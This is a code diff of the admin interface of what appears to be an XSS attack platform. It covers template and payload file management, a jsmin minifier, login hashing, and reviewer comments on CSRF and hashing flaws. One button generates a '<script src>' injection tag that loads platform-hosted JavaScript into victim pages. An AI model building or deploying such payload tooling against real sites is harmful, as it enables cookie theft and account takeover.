if (get.i == get.l) {
return EOF;
}
theLookahead = EOF;
if (c == EOF) {
c = input.charAt(get.i);
++get.i;
}
if (c >= ' ' || c == '\n') {
return c;
}
if (c == '\r') {
return '\n';
}
return ' ';
}
get.i = 0;
get.l = input.length;
/* peek -- get the next character without getting it.
*/
function peek() {
theLookahead = get();
return theLookahead;
}
/* next -- get the next character, excluding comments. peek() is used to see
if a '/' is followed by a '/' or '*'.
*/
function next() {
var c = get();
if (c == '/') {
switch (peek()) {
case '/':
for (;;) {
c = get();
if (c <= '\n') {
return c;
}
}
break;
case '*':
get();
for (;;) {
switch (get()) {
case '*':
if (peek() == '/') {
get();
return ' ';
}
break;
case EOF:
throw 'Error: Unterminated comment.';
}
}
break;
default:
return c;
}
}
return c;
}
/* action -- do something! What you do is determined by the argument:
1 Output A. Copy B to A. Get the next B.
2 Copy B to A. Get the next B. (Delete A).
3 Get the next B. (Delete B).
action treats a string as a single character. Wow!
action recognizes a regular expression if it is preceded by ( or , or =.
*/
function action(d) {
var r = [];
if (d == 1) {
r.push(a);
}
if (d < 3) {
a = b;
if (a == '\'' || a == '"') {
for (;;) {
r.push(a);
a = get();
if (a == b) {
break;
}
if (a <= '\n') {
throw 'Error: unterminated string literal: ' + a;
}
if (a == '\\') {
r.push(a);
a = get();
}
}
}
}
b = next();
if (b == '/' && '(,=:[!&|'.has(a)) {
r.push(a);
r.push(b);
for (;;) {
a = get();
if (a == '/') {
break;
} else if (a =='\\') {
r.push(a);
a = get();
} else if (a <= '\n') {
throw 'Error: unterminated Regular Expression literal';
}
r.push(a);
}
b = next();
}
return r.join('');
}
/* m -- Copy the input to the output, deleting the characters which are
insignificant to JavaScript. Comments will be removed. Tabs will be
replaced with spaces. Carriage returns will be replaced with
linefeeds.
Most spaces and linefeeds will be removed.
*/
function m() {
var r = [];
a = '\n';
r.push(action(3));
while (a != EOF) {
switch (a) {
case ' ':
if (isAlphanum(b)) {
r.push(action(1));
} else {
r.push(action(2));
}
break;
case '\n':
switch (b) {
case '{':
case '[':
case '(':
case '+':
case '-':
r.push(action(1));
break;
case ' ':
r.push(action(3));
break;
default:
if (isAlphanum(b)) {
r.push(action(1));
} else {
if (level == 1 && b != '\n') {
r.push(action(1));
} else {
r.push(action(2));
}
}
}
break;
default:
switch (b) {
case ' ':
if (isAlphanum(a)) {
r.push(action(1));
break;
}
r.push(action(3));
break;
case '\n':
if (level == 1 && a != '\n') {
r.push(action(1));
} else {
switch (a) {
case '}':
case ']':
case ')':
case '+':
case '-':
case '"':
case '\'':
if (level == 3) {
r.push(action(3));
} else {
r.push(action(1));
}
break;
default:
if (isAlphanum(a)) {
r.push(action(1));
} else {
r.push(action(3));
}
}
}
break;
default:
r.push(action(1));
break;
}
}
}
return r.join('');
}
var ret = m(input);
return ret;
}

460
static/js/loadjstemplate.js Normal file

@@ -0,0 +1,460 @@
//myjs的插入模板功能需要知道jsTemplate的内容故设为全局变量
var jsTemplate_source;
var jsTemplate_dataAdapter;
$(document).ready(function() {
var base_height = $("#nav-section").height() - $("#dash-logo").outerHeight(true);
////////////////
//分割栏初始化//
////////////////
$("#jsTemplate_splitter").jqxSplitter({
width: '100%',
height: base_height > 0 ? base_height : 0,
panels: [{
size: '400px'
}]
});
////////////////
//js列表初始化//
////////////////
var jsTemplate_last_select_index = -1;
var jsTemplate_is_select_rollback = false;
var jsTemplate_last_select_name = "";
//数据源与datafields
jsTemplate_source = {
datatype: "json",
datafields: [{
name: "js_uri"
}, {
name: "js_name"
}, {
name: "js_description"
}, {
name: "js_name_abbr"
}, {
name: "js_description_abbr"
}, ],
id: "js_name",
url: urlbase + "?js_template_cmd=list",
};
jsTemplate_dataAdapter = new $.jqx.dataAdapter(jsTemplate_source, {
loadComplete: function() {
if (jsTemplate_last_select_name !== "") {
$("#jsTemplate_listbox").jqxListBox('selectItem', jsTemplate_last_select_name);
jsTemplate_last_select_name = "";
}
}
});
$('#jsTemplate_listbox').jqxListBox({
selectedIndex: -1,
source: jsTemplate_dataAdapter,
displayMember: "js_name",
valueMember: "js_name",
itemHeight: 60,
width: '100%',
height: base_height - 29 > 0 ? base_height - 29 : 0,
renderer: function(index, label, value) {
//注js_name_abbr与js_description_abbr经过了stripStr
var datarecord = jsTemplate_dataAdapter.records[index];
var imgurl = 'static/images/js_icon.png';
var img = '<img height="50" width="50" src="' + imgurl + '"/>';
var table = '<table class="listbox_item_table"><tr><td class="listbox_item_img" rowspan="2">' + img + '</td><td class="listbox_item_name">' + datarecord.js_name_abbr + '.js</td></tr><tr><td class="listbox_item_description">' + datarecord.js_description_abbr + '</td></tr></table>';
return table;
}
});
$('#jsTemplate_listbox').on('select', function(event) {
jsTemplate_update_form(event.args.index);
});
//////////////////
//js列表相关函数//
//////////////////
//清空编辑表单
function jsTemplate_clear_form() {
$('#jsTemplate_name').val("");
$('#jsTemplate_description').val("");
jsTemplate_editor.setValue("", -1);
$('#jsTemplate_form').data('changed', false);
}
//根据列表选中的index加载编辑表单
function jsTemplate_update_form(current_select_index) {
if (jsTemplate_is_select_rollback) {
jsTemplate_is_select_rollback = false;
return;
}
if ($('#jsTemplate_form').data('changed')) {
if (confirm("------------------------------------\n提示未保存的内容将会丢失\n------------------------------------\n\n确认离开吗")) {
$('#jsTemplate_form').data('changed', false);
jsTemplate_last_select_index = current_select_index;
} else {
jsTemplate_is_select_rollback = true;
$('#jsTemplate_listbox').jqxListBox('selectIndex', jsTemplate_last_select_index);
return;
}
} else {
jsTemplate_last_select_index = current_select_index;
}
//index为-1代表list没有选中项现在是新增一个js
if (current_select_index === -1) {
$('#jsTemplate_ok').text('新增');
jsTemplate_clear_form();
}
//index为大于0代表现在是修改一个js
else {
$('#jsTemplate_ok').text('修改');
var datarecord = jsTemplate_dataAdapter.records[current_select_index];
$('#jsTemplate_name').val(datarecord.js_name);
$('#jsTemplate_description').val(datarecord.js_description);
jsTemplate_update_content(datarecord.js_name);
}
}
//根据列表选中的index将对应js的内容加载到编辑器中
function jsTemplate_update_content(filename) {
$('#jsTemplate_form').data('changed', false);
jsTemplate_editor.setReadOnly(true);
$.ajax({
url: urlbase + "?js_template_cmd=get&name=" + filename,
dataType: "json",
timeout: interval,
success: function(data) {
jsTemplate_editor.setValue(data, -1);
$('#jsTemplate_form').data('changed', false);
jsTemplate_editor.setReadOnly(false);
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
alert("载入超时!");
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
//重新载入js列表
function reload_jsTemplate_listbox() {
$('#jsTemplate_form').data('changed', false);
jsTemplate_dataAdapter.dataBind();
}
//////////////////////
//js列表工具栏初始化//
//////////////////////
$("#jsTemplate_add_button").jqxButton({
width: 65,
height: 20
});
$("#jsTemplate_del_button").jqxButton({
width: 65,
height: 20
});
$("#jsTemplate_clear_button").jqxButton({
width: 65,
height: 20
});
$("#jsTemplate_add_button").click(function(event) {
$('#jsTemplate_listbox').jqxListBox('selectIndex', -1);
});
$("#jsTemplate_del_button").click(function(event) {
var index = $("#jsTemplate_listbox").jqxListBox('getSelectedIndex');
if (index >= 0) {
if (confirm("您确认执行删除操作么?")) {
var datarecord = jsTemplate_dataAdapter.records[index];
$.ajax({
url: urlbase + "?js_template_cmd=del&name=" + datarecord.js_name,
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
$('#jsTemplate_listbox').jqxListBox('selectIndex', -1);
reload_jsTemplate_listbox();
} else {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {    
if (status == 'timeout')    {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php"; 
} 
}
});
}
}
});
$("#jsTemplate_clear_button").click(function(event) {
if (confirm("您确认清空所有JS模板么")) {
$.ajax({
url: urlbase + "?js_template_cmd=clear",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
$('#jsTemplate_listbox').jqxListBox('selectIndex', -1);
reload_jsTemplate_listbox();
} else {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
});
//////////////////////
//编辑面板表单初始化//
//////////////////////
$("#jsTemplate_form").change(function() {
$('#jsTemplate_form').data('changed', true);
});
//////////////////////////
//编辑面板输入控件初始化//
//////////////////////////
$("#jsTemplate_name").jqxInput({
width: '80%',
height: '20px',
placeHolder: '请输入js模板名...'
});
$('#jsTemplate_description').jqxTextArea({
width: '100%',
height: 50,
placeHolder: '请输入js模板描述...'
});
////////////////
//编辑器初始化//
////////////////
$('#jsTemplate_content').height(base_height - 207 > 0 ? base_height - 207 : 0);
var jsTemplate_editor = ace.edit("jsTemplate_content");
jsTemplate_editor.setTheme("ace/theme/chrome");
jsTemplate_editor.session.setMode("ace/mode/javascript");
jsTemplate_editor.session.setUseWrapMode(true);
jsTemplate_editor.renderer.setScrollMargin(10, 10);
jsTemplate_editor.setOptions({
// "scrollPastEnd": 0.8,
autoScrollEditorIntoView: true
});
jsTemplate_editor.on("change", function() {
$('#jsTemplate_form').data('changed', true);
});
jsTemplate_editor.$blockScrolling = Infinity;
jsTemplate_editor.setFontSize(16);
//////////////////////
//编辑器工具栏初始化//
//////////////////////
$("#jsTemplate_content_toolBar").jqxToolBar({
width: "100%",
height: 35,
minimizeWidth: 100,
tools: 'button | button | button',
initTools: function(type, index, tool, menuToolIninitialization) {
if (type == "button") {
tool.attr("type", "button");
}
switch (index) {
case 0:
tool.val("格式化");
tool.click(function() {
var source = jsTemplate_editor.getValue();
if (source !== "") {
var output = js_beautify(source);
jsTemplate_editor.setValue(output, -1);
}
});
break;
case 1:
tool.val("压缩");
tool.click(function() {
var source = jsTemplate_editor.getValue();
if (source !== "") {
var output = jsmin(source, 3);
jsTemplate_editor.setValue(output.trim(), -1);
}
});
break;
case 2:
tool.val("复制js地址");
var client = new ZeroClipboard(tool);
client.on("copy", function(event) {
var index = $("#jsTemplate_listbox").jqxListBox('getSelectedIndex');
if (index >= 0) {
var clipboard = event.clipboardData;
var datarecord = jsTemplate_dataAdapter.records[index];
var pos = window.location.href.lastIndexOf("/");
var url = window.location.href.substr(0, pos + 1) + datarecord.js_uri;
clipboard.setData("text/plain", url);
//alert("JS地址已复制至剪切板\n" + url);
} else {
alert("请先保存!");
}
});
break;
}
}
});
//////////////////////////
//编辑表单提交按键初始化//
//////////////////////////
$("#jsTemplate_ok").jqxButton({
width: 65,
height: 25
});
$("#jsTemplate_cancel").jqxButton({
width: 65,
height: 25
});
$("#jsTemplate_ok").click(function(event) {
var name = $('#jsTemplate_name').val();
var desc = $('#jsTemplate_description').val();
var content = jsTemplate_editor.getValue();
var index = $("#jsTemplate_listbox").jqxListBox('getSelectedIndex');
//当前状态为新增一个js
if (index === -1) {
var data = {
'name': name,
'desc': desc,
'content': content
};
$.ajax({
type: 'POST',
data: data,
url: urlbase + "?js_template_cmd=add",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
jsTemplate_last_select_name = name;
reload_jsTemplate_listbox();
} else {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
//当前状态为修改一个js
else {
var datarecord = jsTemplate_dataAdapter.records[index];
var data = {
'old_name': datarecord.js_name,
'name': name,
'desc': desc,
'content': content
};
$.ajax({
type: 'POST',
data: data,
url: urlbase + "?js_template_cmd=modify",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
jsTemplate_last_select_name = name;
reload_jsTemplate_listbox();
} else {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
});
$("#jsTemplate_cancel").click(function(event) {
$('#jsTemplate_form').data('changed', false);
var index = $("#jsTemplate_listbox").jqxListBox('getSelectedIndex');
jsTemplate_update_form(index);
});
//////////////
//大小自适应//
//////////////
$(window).resize(function() {
var base_height = $("#nav-section").height() - $("#dash-logo").outerHeight(true);
$("#jsTemplate_splitter").jqxSplitter({
height: base_height > 0 ? base_height : 0
});
$('#jsTemplate_listbox').jqxListBox({
height: base_height - 29 > 0 ? base_height - 29 : 0
});
$('#jsTemplate_content').height(base_height - 207 > 0 ? base_height - 207 : 0);
});
});
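Review bot: The `jsTemplate_del_button` and `jsTemplate_clear_button` handlers send state-changing requests as plain GETs, and the delete handler concatenates the template name unencoded into the query string (`urlbase + "?js_template_cmd=del&name=" + datarecord.js_name`). A name containing `&`, `#` or `+` therefore addresses a different resource than the one selected, and if the server authorises these commands by session cookie alone (the server side is not shown here) any cross-site GET could delete or clear templates. I would send them the way `add` and `modify` already do, `type: 'POST', data: { name: datarecord.js_name },` with `url: urlbase + "?js_template_cmd=del"`, and have the server require POST plus an anti-CSRF token for `del` and `clear`. `jsTemplate_update_content` builds `name=` the same way and should at least use `encodeURIComponent(filename)`. static/js/loadmyjs.js repeats the pattern for `my_js_cmd=get`, `my_js_cmd=del` and `my_js_cmd=clear`.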

558
static/js/loadmyjs.js Normal file

@@ -0,0 +1,558 @@
$(document).ready(function() {
var base_height = $("#nav-section").height() - $("#dash-logo").outerHeight(true);
////////////////
//分割栏初始化//
////////////////
$("#myJS_splitter").jqxSplitter({
width: '100%',
height: base_height > 0 ? base_height : 0,
panels: [{
size: '400px'
}]
});
////////////////
//js列表初始化//
////////////////
var myJS_last_select_index = -1;
var myJS_is_select_rollback = false;
var myJS_last_select_name = "";
//数据源与datafields
var myJS_source = {
datatype: "json",
datafields: [{
name: "js_uri"
}, {
name: "js_name"
}, {
name: "js_description"
}, {
name: "js_name_abbr"
}, {
name: "js_description_abbr"
}, ],
id: "js_name",
url: urlbase + "?my_js_cmd=list",
};
var myJS_dataAdapter = new $.jqx.dataAdapter(myJS_source, {
loadComplete: function() {
if (myJS_last_select_name !== "") {
$("#myJS_listbox").jqxListBox('selectItem', myJS_last_select_name);
myJS_last_select_name = "";
}
}
});
$('#myJS_listbox').jqxListBox({
selectedIndex: -1,
source: myJS_dataAdapter,
displayMember: "js_name",
valueMember: "js_name",
itemHeight: 60,
width: '100%',
height: base_height - 29 > 0 ? base_height - 29 : 0,
renderer: function(index, label, value) {
//注js_name_abbr与js_description_abbr经过了stripStr
var datarecord = myJS_dataAdapter.records[index];
var imgurl = 'static/images/js_icon.png';
var img = '<img height="50" width="50" src="' + imgurl + '"/>';
var table = '<table class="listbox_item_table"><tr><td class="listbox_item_img" rowspan="2">' + img + '</td><td class="listbox_item_name">' + datarecord.js_name_abbr + '.js</td></tr><tr><td class="listbox_item_description">' + datarecord.js_description_abbr + '</td></tr></table>';
return table;
}
});
$('#myJS_listbox').on('select', function(event) {
myJS_update_form(event.args.index);
});
//////////////////
//js列表相关函数//
//////////////////
//清空编辑表单
function myJS_clear_form() {
$('#myJS_name').val("");
$('#myJS_description').val("");
myJS_editor.setValue("", -1);
$('#myJS_form').data('changed', false);
}
//根据列表选中的index加载编辑表单
function myJS_update_form(current_select_index) {
if (myJS_is_select_rollback) {
myJS_is_select_rollback = false;
return;
}
if ($('#myJS_form').data('changed')) {
if (confirm("------------------------------------\n提示未保存的内容将会丢失\n------------------------------------\n\n确认离开吗")) {
$('#myJS_form').data('changed', false);
myJS_last_select_index = current_select_index;
} else {
myJS_is_select_rollback = true;
$('#myJS_listbox').jqxListBox('selectIndex', myJS_last_select_index);
return;
}
} else {
myJS_last_select_index = current_select_index;
}
//index为-1代表list没有选中项现在是新增一个js
if (current_select_index === -1) {
$('#myJS_ok').text('新增');
myJS_clear_form();
}
//index为大于0代表现在是修改一个js
else {
$('#myJS_ok').text('修改');
var datarecord = myJS_dataAdapter.records[current_select_index];
$('#myJS_name').val(datarecord.js_name);
$('#myJS_description').val(datarecord.js_description);
myJS_update_content(datarecord.js_name);
}
}
//根据列表选中的index将对应js的内容加载到编辑器中
function myJS_update_content(filename) {
$('#myJS_form').data('changed', false);
myJS_editor.setReadOnly(true);
$.ajax({
url: urlbase + "?my_js_cmd=get&name=" + filename,
dataType: "json",
timeout: interval,
success: function(data) {
myJS_editor.setValue(data, -1);
$('#myJS_form').data('changed', false);
myJS_editor.setReadOnly(false);
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
alert("载入超时!");
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
//重新载入js列表
function reload_myJS_listbox() {
$('#myJS_form').data('changed', false);
myJS_dataAdapter.dataBind();
}
//////////////////////
//js列表工具栏初始化//
//////////////////////
$("#myJS_add_button").jqxButton({
width: 65,
height: 20
});
$("#myJS_del_button").jqxButton({
width: 65,
height: 20
});
$("#myJS_clear_button").jqxButton({
width: 65,
height: 20
});
$("#myJS_add_button").click(function(event) {
$('#myJS_listbox').jqxListBox('selectIndex', -1);
});
$("#myJS_del_button").click(function(event) {
var index = $("#myJS_listbox").jqxListBox('getSelectedIndex');
if (index >= 0) {
if (confirm("您确认执行删除操作么?")) {
var datarecord = myJS_dataAdapter.records[index];
$.ajax({
url: urlbase + "?my_js_cmd=del&name=" + datarecord.js_name,
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
$('#myJS_listbox').jqxListBox('selectIndex', -1);
reload_myJS_listbox();
} else {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
}
});
$("#myJS_clear_button").click(function(event) {
if (confirm("您确认清空所有JS模板么")) {
$.ajax({
url: urlbase + "?my_js_cmd=clear",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
$('#myJS_listbox').jqxListBox('selectIndex', -1);
reload_myJS_listbox();
} else {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
});
//////////////////////
//编辑面板表单初始化//
//////////////////////
$("#myJS_form").change(function() {
$('#myJS_form').data('changed', true);
});
//////////////////////////
//编辑面板输入控件初始化//
//////////////////////////
$("#myJS_name").jqxInput({
width: '80%',
height: '20px',
placeHolder: '请输入js模板名...'
});
$('#myJS_description').jqxTextArea({
width: '100%',
height: 50,
placeHolder: '请输入js模板描述...'
});
////////////////
//编辑器初始化//
////////////////
$('#myJS_content').height(base_height - 207 > 0 ? base_height - 207 : 0);
var myJS_editor = ace.edit("myJS_content");
myJS_editor.setTheme("ace/theme/chrome");
myJS_editor.session.setMode("ace/mode/javascript");
myJS_editor.session.setUseWrapMode(true);
myJS_editor.renderer.setScrollMargin(10, 10);
myJS_editor.setOptions({
// "scrollPastEnd": 0.8,
autoScrollEditorIntoView: true
});
myJS_editor.on("change", function() {
$('#myJS_form').data('changed', true);
});
myJS_editor.$blockScrolling = Infinity;
myJS_editor.setFontSize(16);
//////////////////////
//编辑器工具栏初始化//
//////////////////////
$("#myJS_content_toolBar").jqxToolBar({
width: "100%",
height: 35,
minimizeWidth: 100,
tools: 'button | button | combobox button | button | button',
initTools: function(type, index, tool, menuToolIninitialization) {
if (type == "button") {
tool.attr("type", "button");
}
switch (index) {
case 0:
tool.val("格式化");
tool.click(function() {
var source = myJS_editor.getValue();
if (source !== "") {
var output = js_beautify(source);
myJS_editor.setValue(output, -1);
}
});
break;
case 1:
tool.val("压缩");
tool.click(function() {
var source = myJS_editor.getValue();
if (source !== "") {
var output = jsmin(source, 3);
myJS_editor.setValue(output.trim(), -1);
}
});
break;
case 2:
tool.attr("id", "insert_jsTemplate_button");
break;
case 3:
tool.val("插入模板");
tool.click(function() {
var index = $("#insert_jsTemplate_button").jqxComboBox('getSelectedIndex');
if (index >= 0) {
var datarecord = jsTemplate_dataAdapter.records[index];
$.ajax({
url: urlbase + "?js_template_cmd=get&name=" + datarecord.js_name,
dataType: "json",
timeout: interval,
success: function(data) {
myJS_editor.insert(data);
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
alert("载入超时!");
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
});
break;
case 4:
tool.val("生成payload");
tool.click(function() {
var index = $("#myJS_listbox").jqxListBox('getSelectedIndex');
if (index >= 0) {
var datarecord = myJS_dataAdapter.records[index];
var pos = window.location.href.lastIndexOf("/");
var url = window.location.href.substr(0, pos + 1) + datarecord.js_uri;
$("#Ww_B_0_textarea").val('<script src="' + url + '"></script>');
$('#xssorWindow').jqxWindow('open');
$('#xssorWindow').addClass('animated');
} else {
alert("请先保存!");
}
});
break;
case 5:
tool.val("复制js地址");
var client = new ZeroClipboard(tool);
client.on("copy", function(event) {
var index = $("#myJS_listbox").jqxListBox('getSelectedIndex');
if (index >= 0) {
var clipboard = event.clipboardData;
var datarecord = myJS_dataAdapter.records[index];
var pos = window.location.href.lastIndexOf("/");
var url = window.location.href.substr(0, pos + 1) + datarecord.js_uri;
clipboard.setData("text/plain", url);
//alert("JS地址已复制至剪切板\n" + url);
} else {
alert("请先保存!");
}
});
break;
}
}
});
$("#insert_jsTemplate_button").jqxComboBox({
source: jsTemplate_dataAdapter,
selectedIndex: 0,
displayMember: "js_name",
valueMember: "js_name",
width: 200,
autoDropDownHeight: false,
placeHolder: "选择js模板",
renderer: function(index, label, value) {
var datarecord = jsTemplate_dataAdapter.records[index];
var imgurl = 'static/images/js_icon.png';
var img = '<img height="50" width="50" src="' + imgurl + '"/>';
var table = '<table class="listbox_item_table"><tr><td class="listbox_item_img" rowspan="2">' + img + '</td><td class="listbox_item_name">' + datarecord.js_name_abbr + '.js</td></tr><tr><td class="listbox_item_description">' + datarecord.js_description_abbr + '</td></tr></table>';
return table;
}
});
//////////////////////////
//编辑表单提交按键初始化//
//////////////////////////
$("#myJS_ok").jqxButton({
width: 65,
height: 25
});
$("#myJS_cancel").jqxButton({
width: 65,
height: 25
});
$("#myJS_ok").click(function(event) {
var name = $('#myJS_name').val();
var desc = $('#myJS_description').val();
var content = myJS_editor.getValue();
var index = $("#myJS_listbox").jqxListBox('getSelectedIndex');
//当前状态为新增一个js
if (index === -1) {
var data = {
'name': name,
'desc': desc,
'content': content
};
$.ajax({
type: 'POST',
data: data,
url: urlbase + "?my_js_cmd=add",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
myJS_last_select_name = name;
reload_myJS_listbox();
} else {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
//当前状态为修改一个js
else {
var datarecord = myJS_dataAdapter.records[index];
var data = {
'old_name': datarecord.js_name,
'name': name,
'desc': desc,
'content': content
};
$.ajax({
type: 'POST',
data: data,
url: urlbase + "?my_js_cmd=modify",
dataType: "json",
timeout: interval,
success: function(result) {
if (result) {
myJS_last_select_name = name;
reload_myJS_listbox();
} else {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
}
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
//操作失败!
$('#failedWindow').jqxWindow('open');
$("#failedWindow").addClass('animated');
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
});
$("#myJS_cancel").click(function(event) {
$('#myJS_form').data('changed', false);
var index = $("#myJS_listbox").jqxListBox('getSelectedIndex');
myJS_update_form(index);
});
/////////
//xssor//
/////////
$('#xssorWindow').jqxWindow({
height: 290,
width: 610,
resizable: false,
isModal: true,
modalOpacity: 0.3,
autoOpen: false,
title: "XSS'OR js编码工具",
});
$("#Ww_B_0_textarea").jqxTextArea({
height: 220,
width: 270,
});
$("#rwb_b2").jqxButton();
$("#rwb_b2_j").jqxButton();
$("#rwb_b1").jqxButton();
$("#rwb_b1_j").jqxButton();
$("#rwb_b3").jqxButton();
$("#rwb_b3j").jqxButton();
$("#rwb_b4").jqxButton();
$("#rwb_b4j").jqxButton();
$("#rwb_b5").jqxButton();
$("#rwb_b5j").jqxButton();
$("#rwb_b6").jqxButton();
$("#rwb_b6j").jqxButton();
$("#rwb_b7").jqxButton();
$("#rwb_b7j").jqxButton();
$("#rwb_b8").jqxButton();
//////////////
//大小自适应//
//////////////
$(window).resize(function() {
var base_height = $("#nav-section").height() - $("#dash-logo").outerHeight(true);
$("#myJS_splitter").jqxSplitter({
height: base_height > 0 ? base_height : 0
});
$('#myJS_listbox').jqxListBox({
height: base_height - 29 > 0 ? base_height - 29 : 0
});
$('#myJS_content').height(base_height - 207 > 0 ? base_height - 207 : 0);
});
});

File diff suppressed because it is too large Load Diff


@@ -1,8 +1,8 @@
$(document).ready(function() {
$("#submit").removeAttr("disabled");
$("#submit").click(function(event) {
if($("#password").val()=="")
return true;
if($("#password").val()==="")
return false;
var salt="!KTMdg#^^I6Z!deIVR#SgpAI6qTN7oVl";
$("#password").val(md5(salt + $("#password").val() + salt));
$("#password").val(md5(salt + $("#password").val() + salt));
@@ -10,6 +10,7 @@ $(document).ready(function() {
$("#password").val(md5(salt + $("#password").val() + $("#firesunCheck").val() + salt));
$("#password").val(md5(salt + $("#password").val() + $("#firesunCheck").val() + salt));
$("#password").val(md5(salt + $("#password").val() + $("#firesunCheck").val() + salt));
return true;
});
$("#note").click(function(event) {
alert("神仙难救");
@@ -120,7 +121,6 @@ function ii(a, b, c, d, x, s, t) {
}
function md51(s) {
txt = "";
var n = s.length,
state = [1732584193, -271733879, -1732584194, 271733878],
i;
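Review bot: The hard-coded `salt` and the repeated `md5(salt + … + salt)` rounds in the `#submit` click handler run in the browser, so the posted digest is itself the credential. Anyone who captures it can replay it without knowing the password, and the salt is readable by every visitor. The commit only changes the empty-password branch to `return false` and adds a final `return true`, so this is untouched. The server should treat the posted digest as the secret, store it under a slow salted password hash, and serve the login page over TLS only. The `$("#firesunCheck").val()` rounds look like a server-issued nonce mixed in against replay; if so, say it in a comment such as `// firesunCheck: per-request value from the server, binds the digest to this login attempt`. The click handler spans the first two hunks and `md51` continues past the third.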

File diff suppressed because one or more lines are too long


@@ -7,9 +7,11 @@ function readNotification(){
if(document.title)
document.title=oldTitle;
$(this).parent().fadeOut(200);
//reload data
$("#xss_panel_tab").tab('show');
//重新载入数据
$('#panelGrid').jqxGrid('updatebounddata');
}
function showNotification(newUnreadNum,lastedID,interval){


@@ -0,0 +1 @@
define("ace/theme/chrome",["require","exports","module","ace/lib/dom"],function(e,t,n){t.isDark=!1,t.cssClass="ace-chrome",t.cssText='.ace-chrome .ace_gutter {background: #ebebeb;color: #333;overflow : hidden;}.ace-chrome .ace_print-margin {width: 1px;background: #e8e8e8;}.ace-chrome {background-color: #FFFFFF;color: black;}.ace-chrome .ace_cursor {color: black;}.ace-chrome .ace_invisible {color: rgb(191, 191, 191);}.ace-chrome .ace_constant.ace_buildin {color: rgb(88, 72, 246);}.ace-chrome .ace_constant.ace_language {color: rgb(88, 92, 246);}.ace-chrome .ace_constant.ace_library {color: rgb(6, 150, 14);}.ace-chrome .ace_invalid {background-color: rgb(153, 0, 0);color: white;}.ace-chrome .ace_fold {}.ace-chrome .ace_support.ace_function {color: rgb(60, 76, 114);}.ace-chrome .ace_support.ace_constant {color: rgb(6, 150, 14);}.ace-chrome .ace_support.ace_type,.ace-chrome .ace_support.ace_class.ace-chrome .ace_support.ace_other {color: rgb(109, 121, 222);}.ace-chrome .ace_variable.ace_parameter {font-style:italic;color:#FD971F;}.ace-chrome .ace_keyword.ace_operator {color: rgb(104, 118, 135);}.ace-chrome .ace_comment {color: #236e24;}.ace-chrome .ace_comment.ace_doc {color: #236e24;}.ace-chrome .ace_comment.ace_doc.ace_tag {color: #236e24;}.ace-chrome .ace_constant.ace_numeric {color: rgb(0, 0, 205);}.ace-chrome .ace_variable {color: rgb(49, 132, 149);}.ace-chrome .ace_xml-pe {color: rgb(104, 104, 91);}.ace-chrome .ace_entity.ace_name.ace_function {color: #0000A2;}.ace-chrome .ace_heading {color: rgb(12, 7, 255);}.ace-chrome .ace_list {color:rgb(185, 6, 144);}.ace-chrome .ace_marker-layer .ace_selection {background: rgb(181, 213, 255);}.ace-chrome .ace_marker-layer .ace_step {background: rgb(252, 255, 0);}.ace-chrome .ace_marker-layer .ace_stack {background: rgb(164, 229, 101);}.ace-chrome .ace_marker-layer .ace_bracket {margin: -1px 0 0 -1px;border: 1px solid rgb(192, 192, 192);}.ace-chrome .ace_marker-layer .ace_active-line {background: rgba(0, 0, 0, 
